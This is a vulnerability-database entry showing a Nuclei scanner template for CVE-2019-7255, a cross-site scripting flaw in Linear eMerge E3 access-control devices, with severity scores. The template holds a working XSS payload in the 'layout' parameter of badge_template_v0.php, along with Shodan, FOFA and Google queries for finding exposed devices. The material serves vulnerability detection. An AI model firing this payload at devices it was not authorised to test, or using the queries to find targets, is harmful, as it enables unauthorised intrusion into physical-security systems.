Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-7255
HistoryAug 30, 2022 - 5:56 p.m.

Linear eMerge E3 - Cross-Site Scripting

2022-08-3017:56:28
ProjectDiscovery
github.com
8
cross-site scripting
vulnerability
arbitrary script code
security patches
updates
nortek control
cwe-79
cve-2019-7255
emerge
packetstorm

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

AI Score

6.2

Confidence

High

EPSS

0.006

Percentile

78.0%

Linear eMerge E3-Series devices are vulnerable to cross-site scripting via the 'layout' parameter.
id: CVE-2019-7255

info:
  name: Linear eMerge E3 - Cross-Site Scripting
  author: arafatansari
  severity: medium
  description: |
    Linear eMerge E3-Series devices are vulnerable to cross-site scripting via the 'layout' parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
  reference:
    - https://www.applied-risk.com/resources/ar-2019-005
    - https://applied-risk.com/labs/advisories
    - https://packetstormsecurity.com/files/155253/Linear-eMerge-E3-1.00-06-Cross-Site-Scripting.html
    - https://nvd.nist.gov/vuln/detail/CVE-2019-7255
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-7255
    cwe-id: CWE-79
    epss-score: 0.01232
    epss-percentile: 0.85132
    cpe: cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: nortekcontrol
    product: linear_emerge_essential_firmware
    shodan-query:
      - http.title:"eMerge"
      - http.title:"emerge"
    fofa-query: title="emerge"
    google-query: intitle:"emerge"
  tags: cve,cve2019,emerge,xss,packetstorm,nortek,nortekcontrol

http:
  - method: GET
    path:
      - "{{BaseURL}}/badging/badge_template_v0.php?layout=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Template : <script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d8ddd702cc0f457e5a34795112850cf0b4badc475aef869bfc839a8366b7055a02204dbcdef719f57c58028f231284a222849e4400b3c6f868e23817cdb39036a6ea:922c64590222798bb761d5b6d8e72950

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

AI Score

6.2

Confidence

High

EPSS

0.006

Percentile

78.0%